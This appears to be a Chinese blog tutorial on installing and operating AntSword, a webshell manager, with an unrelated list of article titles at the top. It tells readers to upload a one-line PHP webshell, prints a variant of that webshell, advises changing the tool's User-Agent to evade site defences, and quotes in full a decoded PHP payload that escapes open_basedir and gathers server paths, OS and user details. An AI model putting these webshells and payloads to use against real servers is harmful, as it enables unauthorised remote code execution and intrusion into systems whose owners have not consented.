- 1Java实现观察者模式_java 服务端如何使用观察者
- 2Kubernetes(K8s)的Service解析_kubernetes中service的作用
- 353 个 CSS 特效 2
- 4【C++】list的使用(上)
- 5PCB安规设计是怎样的?怎样设计高压电源的安规?ECM设计间距是怎样的,CAF设计间距要求是怎样的?电源的PCB间距设计指南,安规标准有哪些?380V电源安规设计_抗caf距离设计
- 6SQL SERVER登录名的创建与删除_sql server 新建登录名
- 7HDFS文件权限及ACL访问控制_hdfs setfacl
- 8Centos7 安装Git、使用_centos git
- 9数据结构 — 链表
- 10远程控制软件安全吗?一文看懂ToDesk、RayLink、TeamViewer、Splashtop相关安全机制_todesk安全事故
中国蚁剑(antSword)下载、安装、使用教程
赞
踩
中国蚁剑(antSword)下载、安装、使用教程
下载地址
需要两个包
一个是项目核心源码”antSword“
https://github.com/AntSwordProject/antSword
一个是加载器
https://github.com/AntSwordProject/AntSword-Loader
安装
用下载的AntSword-Loader-v4.0.3-win32-x64.zip 以Windows版本64位来示例
解压
1.启动AntSword-Loader-v4.0.3-win32-x64 下的 AntSword.exe
2.点击初始化
3.选择下载的源码文件夹 antSword-master
如果只下载了加载器,选择一个空文件夹,加载器会自动帮你下载核心项目源码
4.等初始化完成后,重启“AntSword.exe”即可正常启动!
.
使用
首页点击右键 添加数据
打开后
url地址就是我们木马的地址 如
我们上传一个一句话木马文件 yijuhua.php
密码就是我们要执行的参数 $_POST 参数是1 密码就是1
最好选个编码方式 不选默认default 是明文传输 也可以自己建个编码
新版增加了 请求信息
如果后端对 请求头 请求体 加限制这个就有用 可以加UA等请求头 或者像这样的木马
<? $_POST['2']($_POST['1']); ?>
- 1
至于为什么是assert 可以看这篇博客
RCE漏洞总结及绕过—代码执行篇
设置完成就可以点击添加数据了
连接
双击就可以连接了 对于文件 双击或者编辑都可以打开
右键 选择虚拟终端 编辑数据(就是修改上面的参数)
还可以设置代理 设成burp的代理 抓个包 看看
蚁剑的 很简单 但是新版的UA 不再是User-Agent: antSword/* 从modules\request.js看,变成随机UA了
如果UA有antSword/* 建议修改modules\request.js 很多网站防蚁剑
密码1 的数据 被我们设置的chr编码了
添加的请求体2 没有编码
没有加密的 是这样的
url解码后
@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.5a40bf236d";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "2e180"."19b51";echo @asenc($output);echo "a875"."de4ad";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
- 1
